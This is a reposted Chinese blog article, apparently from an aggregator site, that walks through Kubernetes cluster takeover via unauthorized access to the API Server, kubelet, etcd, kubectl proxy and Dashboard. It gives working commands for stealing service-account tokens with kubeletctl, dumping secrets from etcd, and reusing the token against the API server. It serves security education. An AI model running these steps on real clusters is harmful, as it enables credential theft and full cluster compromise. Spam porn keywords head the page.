国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵

這篇具有很好參考價值的文章主要介紹了K8s攻擊案例:組件未授權(quán)訪問導致集群入侵。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

K8s集群往往會因為組件的不安全配置存在未授權(quán)訪問的情況,如果攻擊者能夠進行未授權(quán)訪問,可能導致集群節(jié)點遭受入侵。比較常見的的組件未授權(quán)訪問漏洞,主要包括 API Server 未授權(quán)訪問、kubelet 未授權(quán)訪問、etcd 未授權(quán)訪問、kube-proxy 不安全配置、Dashboard未授權(quán)訪問。

接下來,我們將對這幾個未授權(quán)訪問的攻擊場景和攻擊過程進行詳細的分析。

01、 API Server未授權(quán)訪問

API Server 是集群的管理入口,任何資源請求或調(diào)用都是通過kube-apiserver提供的接口進行。默認情況下,API Server提供兩個端口服務(wù),8080和6443,配置不當將出現(xiàn)未授權(quán)訪問。

8080端口,默認不啟動,無需認證和授權(quán)檢查,一旦暴露將導致未授權(quán)訪問。

6443端口,默認啟動需要認證,如果出現(xiàn)配置錯誤,將system:anonymous用戶綁定到cluster-admin用戶組,將出現(xiàn)未授權(quán)訪問。

(1)攻擊場景

insecure-port默認值為0,將其修改為8080端口,再添加insecure-bind-address=0.0.0.0,允許遠程訪問本地的8080端口。

vi /etc/kubernetes/manifests/kube-apiserver.yaml


    - --insecure-port=8080
    - --insecure-bind-address=0.0.0.0

修改kube-apiserver.yaml文件:

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

無需啟動,等待一會以后,8080服務(wù)自動起來了,通過瀏覽器可以訪問8080端口返回API列表。

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

(2)攻擊過程

未授權(quán)訪問的情況下,kubectl可以使用-s參數(shù)指定Kubernetes API服務(wù)器地址和端口,直接執(zhí)行命令創(chuàng)建惡意Pod,將其掛載到Master節(jié)點,從而實現(xiàn)對整個集群的接管。

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

02、 kubelet未授權(quán)訪問

kubelet會在集群中每個節(jié)點運行,對容器進行生命周期的管理,如果kubelet配置不當,攻擊者可創(chuàng)建惡意Pod嘗試逃逸到宿主機。

(1)攻擊場景

anonymous默認為false,修改為true,并將mode從Webhook修改為AlwaysAllow。

vi /var/lib/kubelet/config.yaml
anonymous:
    enabled: true


authorization:
  mode: AlwayAllow

修改node節(jié)點配置,重啟kubelet服務(wù)。

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

訪問kubelet 10250服務(wù),出現(xiàn)未授權(quán)訪問。

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

(2) 攻擊過程

kubeletctl 是一個用于與kubelet API 交互的命令行工具,可以通過kubeletctl執(zhí)行命令獲取Node權(quán)限。從Node節(jié)點竊取高權(quán)限服務(wù)賬戶token,使用服務(wù)賬戶向API Server進行驗證,從而獲取集群權(quán)限。

wget https://github.com/cyberark/kubeletctl/releases/download/v1.11/kubeletctl_linux_amd64
chmod 777 kubeletctl_linux_amd64
mv ./kubeletctl_linux_amd64 kubeletctl
#列出kubelet的所有pod
./kubeletctl pods -i --server 192.168.44.136


#搜索容器里面的Service Account
./kubeletctl?scan?token?-i?--server?192.168.44.136

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

03、etcd 未授權(quán)訪問

etcd 用于存儲K8s集群中的所有配置數(shù)據(jù)和狀態(tài)信息,如果管理員配置不當,導致etcd未授權(quán)訪問的情況,那么攻擊者就可以從etcd中獲取secrets&token等關(guān)鍵信息,進而通過kubectl創(chuàng)建惡意pod從而接管集群。

(1)攻擊場景

將client-cert-auth=true 改為false,把listen-client-urls監(jiān)聽修改為0.0.0.0,將端口被暴露出去,導致etcd存在未授權(quán)訪問漏洞。

vi /etc/kubernetes/manifests/etcd.yaml
    - --client-cert-auth=false
    - --listen-client-urls=http://0.0.0.0:2379

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

(2)攻擊過程

下載etcdctl直接用命令行即可訪問etcd

s://github.com/etcd-io/etcd/releases/download/v3.4.9/etcd-v3.4.9-linux-amd64.tar.gz
tar -xf etcd-v3.4.9-linux-amd64.tar.gz
cd etcd-v3.4.9-linux-amd64
#讀取etcd中存儲的數(shù)據(jù),通過--limit選項限制數(shù)量
export ETCDCTL_API=3
./etcdctl --endpoints=192.168.44.138:2379  get / --prefix --limit=2

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

#獲取k8s的secrets和token
 ./etcdctl --endpoints=192.168.44.138:2379  get / --prefix --keys-only   |grep secrets
 ./etcdctl --endpoints=192.168.44.138:2379  get /registry/secrets/test/bypass-token-p6xpj

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

成功獲取高權(quán)限服務(wù)賬號token

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

通過token訪問API-Server,可進一步創(chuàng)建惡意Pod,獲取集群管理員的權(quán)限。

kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --token=“[.token.]” -n kube-system get pods

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

04、kube-proxy不安全配置

通過使用kube-proxy暴露未授權(quán)訪問的服務(wù)或組件,可能會形成外部攻擊入口點,從而導致集群被入侵。

(1)攻擊場景

使用kubectl proxy命令設(shè)置API server接收所有主機的請求。

kubectl --insecure-skip-tls-verify proxy --accept-hosts=^.*$ --address=0.0.0.0 --port=8009

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

(2)攻擊過程

攻擊者可通過特定端口訪問API Server,可按照API Server未授權(quán)訪問情況直接接管集群。

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

05、Dashboard未授權(quán)訪問

Dashboard 在配置不當情況下有可能會產(chǎn)生未授權(quán)訪問的情況,從而有可能進一步造成接管集群。

(1)攻擊場景

在deployment中開啟enable-skip-login,那么就可以在登錄界面點擊跳過登錄進dashboard。

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

將默認的Kubernetes-dashboard綁定cluster-admin,擁有管理集群管權(quán)限

kubectl create clusterrolebinding dashboard-1  --clusterrole=cluster-admin --serviceaccount=kubernetes-dashboard:kubernetes-dashboard

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

(2)攻擊過程

訪問Kubernetes 儀表盤,出現(xiàn)了跳過按鈕,點擊跳過進入dashboard。

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

進入控制面板,可以看到整個集群的資源情況。

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生

攻擊者通過創(chuàng)建惡意pod,將其掛載到Master節(jié)點,從而實現(xiàn)對整個集群的接管。

K8s攻擊案例:組件未授權(quán)訪問導致集群入侵,kubernetes,容器,云原生文章來源地址http://www.zghlxwxcb.cn/news/detail-774417.html

到了這里,關(guān)于K8s攻擊案例:組件未授權(quán)訪問導致集群入侵的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • k8s簡介、虛擬機快速搭建k8s集群、集群管理方式及K8S工作原理和組件介紹

    k8s簡介、虛擬機快速搭建k8s集群、集群管理方式及K8S工作原理和組件介紹

    1.1、部署方式的變遷 傳統(tǒng)部署時代: 在物理服務(wù)器上運行應(yīng)用程序 無法為應(yīng)用程序定義資源邊界 導致資源分配問題 例如,如果在物理服務(wù)器上運行多個應(yīng)用程序,則可能會出現(xiàn)一個應(yīng)用程序占用大部分資源的情況, 結(jié)果可能導致其他應(yīng)用程序的性能下降。 一種解決方案是

    2024年02月12日
    瀏覽(29)
  • K8s集群架構(gòu)組件(3)

    K8s集群架構(gòu)組件(3)

    ?(2)node組件 kubelet:master排到node節(jié)點代表,管理本機容器 kube-proxy:提供網(wǎng)絡(luò)代理,負載均衡等操作

    2024年02月17日
    瀏覽(19)
  • k8s實現(xiàn)外部訪問minikube集群

    我們現(xiàn)在大家都知道了 minikube集群相當于k8s的一個虛擬機。 同時pod每次消亡重建之后都會分配一個虛擬的ip,這個ip可供集群內(nèi)部訪問,但是如果要對外訪問呢? 我們可以給他暴露ip出來,但是如果pod宕機后重建ip就發(fā)生了變化,所以不能對pod進行ip的暴露。 那應(yīng)該對什么進行

    2024年02月03日
    瀏覽(27)
  • K8S集群實現(xiàn)外部訪問(INGRESS)

    K8S集群實現(xiàn)外部訪問(INGRESS)

    環(huán)境: master node01 node02 192.168.1.40 192.168.1.41 192.168.1.42 作用:Ingress 是對集群中服務(wù)的外部訪問進行管理的 API 對象。 PS:創(chuàng)建nginx和httpd PS:namespace為ingress-nginx PS:它現(xiàn)在已經(jīng)有一個模板,用來描述Ingress資源能夠收集到的信息了 PS:有DNS的話可以設(shè)置解析,沒有的話必須在h

    2024年01月19日
    瀏覽(24)
  • k8s實戰(zhàn)案例之部署Zookeeper集群

    k8s實戰(zhàn)案例之部署Zookeeper集群

    zookeeper是一個開源的分布式協(xié)調(diào)服務(wù),由知名互聯(lián)網(wǎng)公司Yahoo創(chuàng)建,它是Chubby的開源實現(xiàn);換句話講,zookeeper是一個典型的分布式數(shù)據(jù)一致性解決方案,分布式應(yīng)用程序可以基于它實現(xiàn)數(shù)據(jù)的發(fā)布/訂閱、負載均衡、名稱服務(wù)、分布式協(xié)調(diào)/通知、集群管理、Master選舉、分布式鎖

    2024年02月08日
    瀏覽(24)
  • K8S集群中Node節(jié)點資源不足導致Pod無法運行的故障排查思路

    故障一:Pod數(shù)量太多超出物理節(jié)點的限制 每一臺Node節(jié)點中默認限制最多運行110個Pod資源,當一個應(yīng)用程序有成百上千的Pod資源時,如果不擴容Node節(jié)點或者修改最大Pod數(shù)量限制,那么就會導致部分Pod資源無法正常運行,因為節(jié)點已經(jīng)沒有資源可以被調(diào)度了。 解決思路就是擴容

    2024年02月02日
    瀏覽(31)
  • k8s配置ingress訪問集群外部資源

    使用ingress訪問外部資源,首先需要創(chuàng)建service指向我們需要訪問的資源 而每個service包含一個endpoint endpoint是k8s集群中的一個資源對象,存儲在etcd中,用來記錄一個service對應(yīng)的所有pod的訪問地址。service配置selector,endpoint controller才會自動創(chuàng)建對應(yīng)的endpoint對象;否則,不會生

    2024年02月09日
    瀏覽(24)
  • K8s 部署 CNI 網(wǎng)絡(luò)組件+k8s 多master集群部署+負載均衡

    K8s 部署 CNI 網(wǎng)絡(luò)組件+k8s 多master集群部署+負載均衡

    ------------------------------ 部署 CNI 網(wǎng)絡(luò)組件 ------------------------------ ---------- 部署 flannel ---------- K8S 中 Pod 網(wǎng)絡(luò)通信: ●Pod 內(nèi)容器與容器之間的通信 在同一個 Pod 內(nèi)的容器(Pod 內(nèi)的容器是不會跨宿主機的)共享同一個網(wǎng)絡(luò)命名空間,相當于它們在同一臺機器上一樣,可以用 lo

    2024年02月08日
    瀏覽(23)
  • K8S訪問控制------認證(authentication )、授權(quán)(authorization )、準入控制(admission control )體系

    K8S訪問控制------認證(authentication )、授權(quán)(authorization )、準入控制(admission control )體系

    在K8S體系中有兩種賬號類型:User accounts(用戶賬號),即針對human user的;Service accounts(服務(wù)賬號),即針對pod的。這兩種賬號都可以訪問 API server,都需要經(jīng)歷認證、授權(quán)、準入控制等步驟,相關(guān)邏輯圖如下所示: 在K8S架構(gòu)中,可以使用多種認證方式,比如:X509 Client Cer

    2024年02月11日
    瀏覽(17)
  • k8s中部署nginx-ingress實現(xiàn)外部訪問k8s集群內(nèi)部服務(wù)

    k8s中部署nginx-ingress實現(xiàn)外部訪問k8s集群內(nèi)部服務(wù)

    k8s通過nginx-ingress實現(xiàn)集群外網(wǎng)訪問功能 1.1 ingress 工作原理 step1:ingress contronler通過與k8s的api進行交互,動態(tài)的去感知k8s集群中ingress服務(wù)規(guī)則的變化,然后讀取它,并按照定義的ingress規(guī)則,轉(zhuǎn)發(fā)到k8s集群中對應(yīng)的service。 step2:而這個ingress規(guī)則寫明了哪個域名對應(yīng)k8s集群中的

    2024年02月07日
    瀏覽(27)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包